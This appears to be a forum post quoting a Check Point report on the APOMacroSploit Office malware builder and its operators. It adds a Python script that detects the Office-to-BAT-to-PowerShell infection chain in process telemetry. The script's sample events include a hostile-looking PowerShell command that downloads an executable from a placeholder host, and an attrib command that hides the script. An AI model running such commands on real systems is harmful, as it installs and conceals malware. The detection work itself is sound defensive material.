- Jul 27, 2015
Quote: "At the end of November, Check Point Research detected a new Office malware builder called APOMacroSploit, which was implicated in multiple malicious emails to more than 80 customers worldwide. In our investigation, we found that this tool includes features to evade detection by Windows Defender and is updated daily to ensure low detection rates. In this article, we reveal the threat actors’ malicious intentions and disclose the real identity of one attacker. We reported this information to the relevant law enforcement authorities.
The malware infection begins when the dynamic content of the attached XLS document is enabled, and an XLM macro automatically starts downloading a Windows system command script. Based on the number of customers and the lowest option price for this product, we estimate that the two main threat actors made at least $5000 in 1.5 months, just by selling the APOMacroSploit product. We followed multiple cases of attacks related to this tool, which we discuss here, and we describe a popular RAT used in this campaign to control the victim’s machine remotely and steal information. Approximately 40 different hackers are involved in this campaign, and utilize 100 different email senders in the attacks. Overall, our telemetry reports attacks occurred in more than 30 different countries.
The initial malicious document our customer received was an XLS file containing an obfuscated XLM macro called Macro 4.0. The macro is triggered automatically when the victim opens the document, and downloads a BAT file from cutt[.]ly. The execution of the command “attrib” enables the BAT script to hide in the victim’s machine. We assume the reordering of the PowerShell instructions via the Start-Sleep command (visible after deobfuscation) is seen by the attacker as another static evasion. At this stage of the attack, the attackers made a key mistake. The cutt[.]ly domain directly redirects to a download server and does not perform the request on the back end."
Quote: "Nitrix and Apocaliptique assist buyers with how to use the tool. Many of the customer nicknames visible on the download server were also found on the channel. For each customer, Apocaliptique and Nitrix created a BAT file to use in the attack (see the procedure description below): This screenshot shows that not only did these hackers sell their attack tools, but they also participated in building and hosting the malware.
After digging into Nitrix's Twitter account, we finally obtained his identity: he revealed his actual name when he posted a picture of a ticket he bought for a concert in December 2014."
Full source:
ApoMacroSploit : Apocalyptical FUD race - Check Point Research (research.checkpoint.com)
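The quoted report describes a three-stage chain: an Office document spawns a command shell that runs a downloaded BAT file, the BAT file hides itself with "attrib", and PowerShell pads its download with Start-Sleep. Below is an added detection example, not code from the Check Point report or from this thread, that scores process-creation events (Sysmon-style parent/child/command-line records) against those three observable behaviours. The event records and command lines are constructed for illustration; the report itself does not publish the exact command lines, so the patterns are assumptions about what the described behaviour looks like in telemetry.

```python
"""Score process-creation events for the Office -> BAT -> attrib -> PowerShell chain.

Added example: hunts over constructed telemetry for the behaviours the quoted
report describes (Office spawning a shell that runs a .bat, 'attrib +h/+s'
hiding the script, PowerShell combining Start-Sleep with a download call).
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Assumed indicators of a PowerShell download primitive (case-insensitive; input is lowercased).
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biwr\b")
# 'attrib' followed by +h or +s before any command separator.
ATTRIB_HIDE_RE = re.compile(r"\battrib\b[^&|]*\+[hs]")

STAGE_TAGS = {"office-spawned-shell", "attrib-hide", "sleep-plus-download"}


def basename(path: str) -> str:
    """Return the lowercase file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> list:
    """Return the list of behaviour tags a single event matches (empty if benign)."""
    findings = []
    parent = basename(ev.parent_image)
    child = basename(ev.image)
    cmd = ev.command_line.lower()
    if parent in OFFICE_PARENTS and child in SHELLS:
        findings.append("office-spawned-shell")
    if child == "cmd.exe" and ".bat" in cmd:
        findings.append("bat-launch")
    if ATTRIB_HIDE_RE.search(cmd):
        findings.append("attrib-hide")
    if child == "powershell.exe" and "start-sleep" in cmd and DOWNLOAD_RE.search(cmd):
        findings.append("sleep-plus-download")
    return findings


def triage(events: list) -> list:
    """Return (index, findings) for every event that matched at least one tag."""
    results = []
    for i, ev in enumerate(events):
        findings = score_event(ev)
        if findings:
            results.append((i, findings))
    return results


def is_full_chain(events: list) -> bool:
    """True when all three stages of the described chain appear in the event set."""
    seen = set()
    for ev in events:
        seen.update(score_event(ev))
    return STAGE_TAGS <= seen


# Constructed sample telemetry (not from the report). Placeholder URL and paths.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\cmd.exe",
                 r'cmd.exe /c "C:\Users\victim\AppData\Local\Temp\update.bat"'),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\attrib.exe",
                 r"attrib +h +s C:\Users\victim\AppData\Local\Temp\update.bat"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -c \"Start-Sleep 5; (New-Object Net.WebClient)"
                 ".DownloadFile('http://download.example.invalid/p', 'C:\\Users\\Public\\p.exe')\""),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c dir"),  # benign: explorer-spawned shell, no other indicator
]

if __name__ == "__main__":
    for idx, tags in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(tags)}")
    print("full chain observed:", is_full_chain(SAMPLE_EVENTS))
```

A single tag such as "office-spawned-shell" is noisy on its own (macros with legitimate shell helpers exist), which is why is_full_chain requires all three stages before treating the host as matching the described pattern; in a real pipeline the events would also be keyed by host and time window rather than scored as one flat list.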